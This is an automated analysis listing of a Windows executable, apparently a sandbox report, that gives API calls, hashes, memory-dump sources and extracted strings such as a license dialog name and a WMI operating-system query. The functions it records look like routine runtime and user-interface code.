                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                          • Instruction ID: e703fe29ab0fc5d4a85227449fc9f0b0a90c568bd997a0917bb438a5577ccfba
                                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                          • Instruction Fuzzy Hash: 8D022D71E002199FDF14CFA9D9806ADB7F2EF48324F29826AD919E7380D731AD41DB90
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FCAF35
                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00FEE72C,?,?), ref: 00FCAF84
                                                          Similarity
                                                          • API ID: FormatInfoLocaleNumber
                                                          • String ID:
                                                          • API String ID: 2169056816-0
                                                          • Opcode ID: 91c6f31d9e9a687a0164973ede6921b48245081e678ea5acfa227922d21afabd
                                                          • Instruction ID: 93db2edba678a5ffa9b94dc74e125c4125f48ee8c06fb46384b52c94ec74aa86
                                                          • Opcode Fuzzy Hash: 91c6f31d9e9a687a0164973ede6921b48245081e678ea5acfa227922d21afabd
                                                          • Instruction Fuzzy Hash: B401BC3A50034DABD7208F60ED4AF9B77BCEF09310F004026FA04AB190E334A914DBA5
                                                          APIs
                                                          • GetLastError.KERNEL32(00FB6DDF,00000000,00000400), ref: 00FB6C74
                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FB6C95
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 8ea7988740d7b15b0fe05635c964d139a058ed7556fcb86568aba708a82352cd
                                                          • Instruction ID: 27fa8e44058ad0a366d9e1211614f6c0a6e5a8f86f4e28cb7598243dca70f2d2
                                                          • Opcode Fuzzy Hash: 8ea7988740d7b15b0fe05635c964d139a058ed7556fcb86568aba708a82352cd
                                                          • Instruction Fuzzy Hash: 15D05E71244300BAEA000A225C4AF6A3B5ABB40B52F14C4047340D90E4C6748410BA14
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE19EF,?,?,00000008,?,?,00FE168F,00000000), ref: 00FE1C21
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: df87500a37025fe88a22f25388fa4ede8d45ea0cc0650853c7630e1f13a55f57
                                                          • Instruction ID: ef40a40a4a0978c60d9b884e3067cd732dc63843b34d30fac1ad54199ed2a9d8
                                                          • Opcode Fuzzy Hash: df87500a37025fe88a22f25388fa4ede8d45ea0cc0650853c7630e1f13a55f57
                                                          • Instruction Fuzzy Hash: BAB16E32610648DFD715CF2EC48ABA57BE0FF45364F298658E89ACF2A1C335E991DB40
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FCF66A
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: 31d37c96d73ea5b2c186a1926d98e622d82a72156c20c3e3bfd14e5a936cee19
                                                          • Instruction ID: c6976df4e262f7206d3e681c724b5174fd2225f7568cdb118c321499adf67a71
                                                          • Opcode Fuzzy Hash: 31d37c96d73ea5b2c186a1926d98e622d82a72156c20c3e3bfd14e5a936cee19
                                                          • Instruction Fuzzy Hash: EE5180B1E0060A8FDB28CF64E986BAAF7F5FB48314F24853DD415EB254D3799904DB50
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00FBB16B
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: 3835586b3cacc96406bb60cefa0e22adbca9a86c184b9f3553a2429b352ff721
                                                          • Instruction ID: 4a231ced8b7542a70772a59932869868bd5ee3fa4d9b3ba0d51f18e2c4d4ed9f
                                                          • Opcode Fuzzy Hash: 3835586b3cacc96406bb60cefa0e22adbca9a86c184b9f3553a2429b352ff721
                                                          • Instruction Fuzzy Hash: D1F017B5E0024CCFDB18CB19EC96AE977B5FB88319F104295D61593390C7B0AA80EE60
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gj
                                                          • API String ID: 0-4203073231
                                                          • Opcode ID: 2be7b98a6e9b71147c5813810c14a74d2ea51b0a145eb96c8070a3b792a98c71
                                                          • Instruction ID: bedc3dec7cf3eddda81f4f8249bdcc7a7312564c6cf6ce0b049e7f02fcd3830b
                                                          • Opcode Fuzzy Hash: 2be7b98a6e9b71147c5813810c14a74d2ea51b0a145eb96c8070a3b792a98c71
                                                          • Instruction Fuzzy Hash: C6C14772A183818FC354CF29D884A5AFBE1BFC8308F19892DE998D7311D734E945DB96
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00FCF3A5), ref: 00FCF9DA
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 17e21acef5da49210a806fa49e5a70649df8695e2a472810ae31ddc09b9d10a8
                                                          • Instruction ID: 14a0e0f6baa551a9302cb22581574be77e982e0421c0bbcfd8308ad9767a0c97
                                                          • Opcode Fuzzy Hash: 17e21acef5da49210a806fa49e5a70649df8695e2a472810ae31ddc09b9d10a8
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Similarity
                                                          • API ID: HeapProcess
                                                          • String ID:
                                                          • API String ID: 54951025-0
                                                          • Opcode ID: e79574c259674fe379b0d8cb720a7af820f76fbe64dce5c14d10cd2c4ec9cc37
                                                          • Instruction ID: 4e3cefad7b599f2cc0245159eb6a54a257233e8155efe8e6876d0fccd67b2a6a
                                                          • Opcode Fuzzy Hash: e79574c259674fe379b0d8cb720a7af820f76fbe64dce5c14d10cd2c4ec9cc37
                                                          • Instruction Fuzzy Hash: A9A02230A02200CFC300CF30AF8C30C3BF8EB082C030A002EA008CA0B8EB3C80A0BB00
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FBE30E
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                            • Part of subcall function 00FC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FF1030,00000200,00FBD928,00000000,?,00000050,00FF1030), ref: 00FC1DC4
                                                          • _strlen.LIBCMT ref: 00FBE32F
                                                          • SetDlgItemTextW.USER32(?,00FEE274,?), ref: 00FBE38F
                                                          • GetWindowRect.USER32(?,?), ref: 00FBE3C9
                                                          • GetClientRect.USER32(?,?), ref: 00FBE3D5
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00FBE475
                                                          • GetWindowRect.USER32(?,?), ref: 00FBE4A2
                                                          • SetWindowTextW.USER32(?,?), ref: 00FBE4DB
                                                          • GetSystemMetrics.USER32(00000008), ref: 00FBE4E3
                                                          • GetWindow.USER32(?,00000005), ref: 00FBE4EE
                                                          • GetWindowRect.USER32(00000000,?), ref: 00FBE51B
                                                          • GetWindow.USER32(00000000,00000002), ref: 00FBE58D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                          • String ID: $%s:$CAPTION$d
                                                          • API String ID: 2407758923-2512411981
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 00FDCB66
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC71E
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC730
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC742
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC754
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC766
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC778
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC78A
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC79C
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7AE
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7C0
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7D2
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7E4
                                                            • Part of subcall function 00FDC701: _free.LIBCMT ref: 00FDC7F6
                                                          • _free.LIBCMT ref: 00FDCB5B
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FDCB7D
                                                          • _free.LIBCMT ref: 00FDCB92
                                                          • _free.LIBCMT ref: 00FDCB9D
                                                          • _free.LIBCMT ref: 00FDCBBF
                                                          • _free.LIBCMT ref: 00FDCBD2
                                                          • _free.LIBCMT ref: 00FDCBE0
                                                          • _free.LIBCMT ref: 00FDCBEB
                                                          • _free.LIBCMT ref: 00FDCC23
                                                          • _free.LIBCMT ref: 00FDCC2A
                                                          • _free.LIBCMT ref: 00FDCC47
                                                          • _free.LIBCMT ref: 00FDCC5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          APIs
                                                          • GetWindow.USER32(?,00000005), ref: 00FCD6C1
                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00FCD6ED
                                                            • Part of subcall function 00FC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FBC116,00000000,.exe,?,?,00000800,?,?,?,00FC8E3C), ref: 00FC1FD1
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00FCD709
                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FCD720
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00FCD734
                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FCD75D
                                                          • DeleteObject.GDI32(00000000), ref: 00FCD764
                                                          • GetWindow.USER32(00000000,00000002), ref: 00FCD76D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                          • String ID: STATIC
                                                          • API String ID: 3820355801-1882779555
                                                          APIs
                                                          • _free.LIBCMT ref: 00FD9705
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FD9711
                                                          • _free.LIBCMT ref: 00FD971C
                                                          • _free.LIBCMT ref: 00FD9727
                                                          • _free.LIBCMT ref: 00FD9732
                                                          • _free.LIBCMT ref: 00FD973D
                                                          • _free.LIBCMT ref: 00FD9748
                                                          • _free.LIBCMT ref: 00FD9753
                                                          • _free.LIBCMT ref: 00FD975E
                                                          • _free.LIBCMT ref: 00FD976C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 322700389-393685449
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB6FAA
                                                          • _wcslen.LIBCMT ref: 00FB7013
                                                          • _wcslen.LIBCMT ref: 00FB7084
                                                            • Part of subcall function 00FB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FB7AAB
                                                            • Part of subcall function 00FB7A9C: GetLastError.KERNEL32 ref: 00FB7AF1
                                                            • Part of subcall function 00FB7A9C: CloseHandle.KERNEL32(?), ref: 00FB7B00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                          • API String ID: 3122303884-3508440684
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FC9736
                                                          • _wcslen.LIBCMT ref: 00FC97D6
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00FC97E5
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FC9806
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                          • API String ID: 1116704506-4209811716
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCB610
                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FCB637
                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FCB650
                                                          • SetWindowTextW.USER32(?,?), ref: 00FCB661
                                                          • GetDlgItem.USER32(?,00000065), ref: 00FCB66A
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FCB67E
                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FCB694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                          • String ID: LICENSEDLG
                                                          • API String ID: 3214253823-2177901306
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,611FB576,00000001,00000000,00000000,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFD99
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFE14
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00FCFE1F
                                                          • _com_issue_error.COMSUPP ref: 00FCFE48
                                                          • _com_issue_error.COMSUPP ref: 00FCFE52
                                                          • GetLastError.KERNEL32(80070057,611FB576,00000001,00000000,00000000,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFE57
                                                          • _com_issue_error.COMSUPP ref: 00FCFE6A
                                                          • GetLastError.KERNEL32(00000000,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFE80
                                                          • _com_issue_error.COMSUPP ref: 00FCFE93
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Similarity
                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                          • String ID:
                                                          • API String ID: 1353541977-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                          • API String ID: 3519838083-3505469590
                                                          • Opcode ID: 1bb65c5e2035bf3737d682322da21d93a5e6cf08cf8a104ae4c7b543f8dfc3c2
                                                          • Instruction ID: 376d3b915cbd227e3a0d8a9b7303e82dd01fbac2bd8c8a598368c2c95caf273e
                                                          • Opcode Fuzzy Hash: 1bb65c5e2035bf3737d682322da21d93a5e6cf08cf8a104ae4c7b543f8dfc3c2
                                                          • Instruction Fuzzy Hash: 1E717C71A00259AFDB14DFA6CC999BFB7B9FF49710B04015DE512A72A0CB74AE01EF60
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB9387
                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FB93AA
                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FB93C9
                                                            • Part of subcall function 00FBC29A: _wcslen.LIBCMT ref: 00FBC2A2
                                                            • Part of subcall function 00FC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FBC116,00000000,.exe,?,?,00000800,?,?,?,00FC8E3C), ref: 00FC1FD1
                                                          • _swprintf.LIBCMT ref: 00FB9465
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • MoveFileW.KERNEL32(?,?), ref: 00FB94D4
                                                          • MoveFileW.KERNEL32(?,?), ref: 00FB9514
                                                          Strings
                                                          Similarity
                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                          • String ID: rtmp%d
                                                          • API String ID: 3726343395-3303766350
                                                          • Opcode ID: a09801815bfc49273b659c513b1f4b7cf1cd99738f906702e9c38d41ba763195
                                                          • Instruction ID: 9460afe4c3da67f29256af0876342ca6ac215416b071c7593b971cfddbe641bd
                                                          • Opcode Fuzzy Hash: a09801815bfc49273b659c513b1f4b7cf1cd99738f906702e9c38d41ba763195
                                                          • Instruction Fuzzy Hash: 24417371904259A6DF31EB62CD45EEE73BCAF41340F0448A9B709E3151DABC8B89AF60
                                                          APIs
                                                          • __aulldiv.LIBCMT ref: 00FC122E
                                                            • Part of subcall function 00FBB146: GetVersionExW.KERNEL32(?), ref: 00FBB16B
                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00FC1251
                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00FC1263
                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FC1274
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1284
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1294
                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00FC12CF
                                                          • __aullrem.LIBCMT ref: 00FC1379
                                                          Similarity
                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                          • String ID:
                                                          • API String ID: 1247370737-0
                                                          • Opcode ID: 97a8b659de082216879cfb45af78ffcb8f4d91bcc0cd14c46eda9e6b0a675c4a
                                                          • Instruction ID: 7712c15f3c45f129dd5d1cf2e085b598608954de5cfee3a15e3ff65024aa217b
                                                          • Opcode Fuzzy Hash: 97a8b659de082216879cfb45af78ffcb8f4d91bcc0cd14c46eda9e6b0a675c4a
                                                          • Instruction Fuzzy Hash: B94137B19083469FC710DF65C884A6BBBE9FB88314F00892EF596C6211E738E559DB51
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FB2536
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                          Strings
                                                          Similarity
                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                          • String ID: ;%u$x%u$xc%u
                                                          • API String ID: 3053425827-2277559157
                                                          • Opcode ID: 441d8b0f023fd6fdfee143a65b34079708c2baa1ba68693c55d18cd16b45087c
                                                          • Instruction ID: e76936020e2c2a620ec59ab533a32f78a13f0e033d4f25c79461fc09f13ffec4
                                                          • Opcode Fuzzy Hash: 441d8b0f023fd6fdfee143a65b34079708c2baa1ba68693c55d18cd16b45087c
                                                          • Instruction Fuzzy Hash: 5FF12D71A043809BDB15EF2688D5BFE77956FA0300F08056DFD859B243CB68D949EFA2
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                          • API String ID: 176396367-3568243669
                                                          • Opcode ID: 59fee702b2abe0d2648a2bfeaa885cf06338f6bc95315209bad8cfbad2ff3b4c
                                                          • Instruction ID: d0c908c932940ac999b788691ba55ddf9d44f8c51780a168ad5e4d64a5c885e3
                                                          • Opcode Fuzzy Hash: 59fee702b2abe0d2648a2bfeaa885cf06338f6bc95315209bad8cfbad2ff3b4c
                                                          • Instruction Fuzzy Hash: A4512656E0836391DB30AA159E1BF7673E0DFA1770F58041EF9C29B2C0FAE58D41A2B1
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FDFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00FDF6CF
                                                          • __fassign.LIBCMT ref: 00FDF74A
                                                          • __fassign.LIBCMT ref: 00FDF765
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FDF78B
                                                          • WriteFile.KERNEL32(?,00000000,00000000,00FDFE02,00000000,?,?,?,?,?,?,?,?,?,00FDFE02,00000000), ref: 00FDF7AA
                                                          • WriteFile.KERNEL32(?,00000000,00000001,00FDFE02,00000000,?,?,?,?,?,?,?,?,?,00FDFE02,00000000), ref: 00FDF7E3
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: f00b18efe93c81422178a51137c23d07d984b7fbc69b727483393b27608bec67
                                                          • Instruction ID: afca61fd77d54f340b5121ce61023949a8ea558d9e3ce9cd205ee3743300c7e1
                                                          • Opcode Fuzzy Hash: f00b18efe93c81422178a51137c23d07d984b7fbc69b727483393b27608bec67
                                                          • Instruction Fuzzy Hash: A551A3B1D002499FCB10CFA4D885EEEBBF5EF08310F18416AE556E7351D634AA44DBA1
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00FD2937
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD293F
                                                          • _ValidateLocalCookies.LIBCMT ref: 00FD29C8
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD29F3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00FD2A48
                                                          Strings
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 47a1e287ba7ba8d37838c7041456f70c179786afec6776a05e8dbd4a62d7f55b
